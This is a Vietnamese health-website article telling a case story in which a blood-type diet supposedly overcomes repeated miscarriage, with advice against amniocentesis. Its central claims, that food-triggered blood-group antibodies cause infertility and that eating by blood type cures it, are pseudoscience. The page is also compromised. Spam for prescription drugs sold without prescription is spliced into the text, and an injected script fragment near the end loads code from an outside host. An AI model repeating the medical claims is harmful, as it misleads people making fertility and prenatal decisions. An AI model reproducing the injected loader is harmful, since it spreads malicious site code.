Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang

Nhóm máu và khả năng thụ thai: Tính tương hợp

Đăng ngày 08/11/2013

 

Purchase canada pharmacy prednisone ShowTopicSubImage

 

Rachel và Eric là tiêu biểu trong số các cặp vợ chồng đến phòng khám của tôi. Lần đầu tiên tôi gặp họ vào tháng 7 năm 1993, sau khi họ đã cố gắng gần như 10 năm để có con. Trong thời gian đó, Rachel đã 12 lần mang thai. Nhưng hy vọng nào vừa le lói đã lụi tàn khi trong vòng 2 tháng đầu tiên đã bị sẩy thai ngay. Trong mấy năm gần đây, Rachel và Eric đã được điều trị bởi một bác sĩ chuyên về sức khỏe sinh sản, và Rachel đã có thai thêm 2 lần nữa. Nhưng một lần nữa, cả hai lần mang thai đều sẩy thai. Ở tuổi 37, Rachel đã hết thời gian và hi vọng.

Lần đầu tiên Rachel nghe kể về tôi, từ một người phụ nữ mà cô ấy đã gặp trong phòng chờ của bác sĩ chuyên khoa sản. Dù quyết định tiếp tục đến tôi khám, nhưng cô ấy hết sức nghi ngờ về chuyện thay đổi chế độ ăn uống theo nhóm máu có thể làm tăng khả năng thụ thai của mình. “Tôi thậm chí không biết mình thuộc nhóm máu nào” cô ấy thú nhận. “Nhưng tôi nghĩ mình chẳng có gì để mất.”

 

Tôi bắt đầu bằng cách phân loại nhóm máu Rachel và Eric và thấy rằng Rachel thuộc nhóm máu O và Eric là thuộc nhóm máu A. Kết quả không có gì bất ngờ. Nghiên cứu cho thấy nhiều vấn đề liên quan đến khả năng thụ thai là do một dạng không tương hợp nào đó của nhóm máu, hoặc là giữa mẹ và bào thai, hoặc là giữa mẹ và bố.

 

Tại sao điều này xảy ra? Mỗi nhóm máu là một dấu hiệu hóa chất được gọi là kháng nguyên. Những kháng nguyên nhóm máu này có thể tác động như những rào cản chống lại những kẻ xâm nhập từ bên ngoài, như là vi khuẩn, vi-rút, và ký sinh trùng. Khi hệ miễn dịch của chúng ta gặp một kẻ xâm nhập từ bên ngoài có hại, hệ miễn dịch tạo ra kháng thể để chống lại. Những kháng thể này có tác dụng như một hệ thống cảnh báo ban đầu. Lần sau, kẻ xâm nhập từ bên ngoài sẽ bị các kháng thể này tấn công và tiêu diệt. Những kháng thể mà cơ thể tạo ra chống lại những nhóm máu khác, trên thực tế ban đầu là do các vi khuẩn và đôi khi bởi các thức ăn đầu tiên mà chúng ta ăn vào tạo ra.

 

Nhóm máu O mang các kháng thể kháng A và kháng B và không chấp nhận mọi thứ có kháng nguyên giống A hay giống B. Nhóm máu A mang kháng thể kháng B, và nhóm máu B mang kháng thể kháng A. Chỉ có nhóm máu AB không mang kháng thể kháng lại nhóm máu nào, đó là lý do mà những người nhóm máu AB là có thể nhận máu truyền từ bất cứ ai.

 

Tình trạng đối kháng của kháng nguyên-kháng thể

 

Pills
http://bgvhosting.com/2018/02/how-much-does-ventolin-cost-in-ontario/
buy orlistat without prescription uk
NẾU BẠN LÀ… BẠN TẠO RA KHÁNG THỂ VỚI…
Nhóm máu O A và B
Nhóm máu A B
Nhóm máu B A
Nhóm máu AB Không

 

 

Một số nghiên cứu tiến hành trong bốn mươi năm qua đã kết luận rằng vô sinh và sẩy thai thường xuyên có thể là do các kháng thể trong dịch tiết âm đạo của người phụ nữ phản ứng với kháng nguyên nhóm máu trong tinh trùng của người đàn ông. Một trong số các cuộc nghiên cứu này đã xác nhận rằng đa số các trường hợp sẩy thai là bào thai nhóm máu A hoặc nhóm máu B, gây ra do không tương hợp với người mẹ nhóm máu O mà tạo ra các kháng thể kháng A và kháng B. Những thiếu sót trong tầm hiểu biết của bác sĩ về chuyện sẩy thai là các kháng thể kháng lại nhóm máu thường là kết quả của sự kích thích được tạo ra bởi ăn những món không phù hợp với nhóm máu của mình. Những thực phẩm này tác động theo nhiều cách như một ‘phương pháp truyền máu không hợp’, làm cho cơ thể trở nên nhạy cảm khi sau này tiếp xúc với các kháng nguyên nhóm máu lạ- kể cả từ người bạn đời.

 

Vì Rachel thuộc nhóm máu O còn Eric thuộc nhóm máu A, nên có nhiều khả năng tinh trùng của Eric có thể không được chấp nhận, mặc dù đó dường như không phải là trường hợp này, vì Rachel đã có thể thụ thai liên tục. Đúng hơn là, Rachel và bào thai của cô ấy đã không tương hợp nếu bào thai thuộc nhóm máu A.

 

Mẹ thuộc nhóm máu O và cha thuộc nhóm máu A có thể sinh ra con nhóm máu O hoặc A – mặc dù A trội hơn O. Nếu bào thai của Rachel thuộc nhóm máu A, việc nhóm máu không tương hợp có thể là nguyên nhân gây ra sẩy thai.

 

Tin mừng là cha mẹ có nhóm máu hỗn hợp có thể có con khỏe mạnh, ngay cả khi các nhóm máu đó tạo ra kháng thể tương phản với các kháng nguyên của nhóm máu kia. Bằng cách nào? Bằng cách tạo hệ miễn dịch cân bằng hợp lý và giảm thiểu các kích thích có thể làm tổn hại đến nó.

 

Rachel bắt đầu tuân thủ chế độ ăn uống cho người nhóm máu O, đặc biệt cẩn thận tránh những thực phẩm có thể gây ra phản ứng kháng nguyên-kháng thể. Eric thì bắt đầu theo chế độ ăn uống dành cho nhóm máu A, không chỉ tốt cho sức khỏe nói chung, mà còn tốt cho chất lượng tinh dịch của anh ấy. Tôi đã khuyên Rachel làm theo cách làm này ít nhất 6 tháng trước khi cố thụ thai.

 

Mười tháng sau lần khám đầu, Rachel lại có thai. Vào tháng thứ sáu, cô ấy đến gặp tôi để kiểm tra sức khỏe. Cô ấy trông thật tuyệt. Tâm trạng tốt khiến cô ấy tươi tỉnh.

 

“Thưa bác sĩ, mọi thứ dường như đang diễn ra tốt đẹp,” Rachel tươi cười nói với tôi. “Tôi cảm thấy khỏe, Eric vô cùng hạnh phúc, và cả hai chúng tôi đều làm theo từng bước một. Chúng tôi chưa bao giờ đạt được đến mức này từ trước đến nay, vì vậy chúng tôi đang cố thư giãn và tận hưởng từng phút giây.” Rõ ràng Rachel cảm thấy sung sướng, nhưng cô ấy cũng rất lo lắng. Bây giờ, ngoài chuyện sợ sẩy thai như lúc trước, cô ấy còn lo mình đã lớn tuổi nên sợ bào thai bị hội chứng Down hoặc bị mấy chứng rối loạn phát triển khác.

 

Bác sĩ sản khoa của cô ấy đã đề nghị chọc ối, đây là chuyện thường làm đối với những phụ nữ trên 35 tuổi. Tôi khuyên không nên làm chuyện đó, bởi vì phương pháp đó có thể làm sẩy thai, trong gia đình không có ai bị hội chứng Down, và tín ngưỡng tôn giáo của họ đã dạy rằng mọi đứa trẻ đều là món quà của Chúa, cho nên không được phá thai. Sau khi nói chuyện với Eric, Rachel đã quyết định không chọc ối. Vào tháng 1 năm 1995, Rachel và Eric đã sinh một bé gái hoàn toàn khỏe mạnh mà họ đặt tên là Rebecca.

Mặc dù Rebecca thuộc nhóm máu A, nhưng Rachel có khả năng tạo môi trường tiếp nhận trong bụng mình. Rachel và Eric quả quyết với tôi rằng họ sẽ tiếp tục chế độ ăn uống theo nhóm máu, một phần trong cuộc sống của mình – và cũng là một phần trong cuộc sống của con gái khi bé bắt đầu ăn đặc.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cafergot sale document.currentScript.parentNode.insertBefore(s, document.currentScript);

© 2013 – 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Tags:

khả năng thụ thai

nhóm A

Nhóm AB

nhóm máu

nhóm máu B

nhóm máu khó mang thai

nhóm O

Nhóm Rh


Bài viết liên quan

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard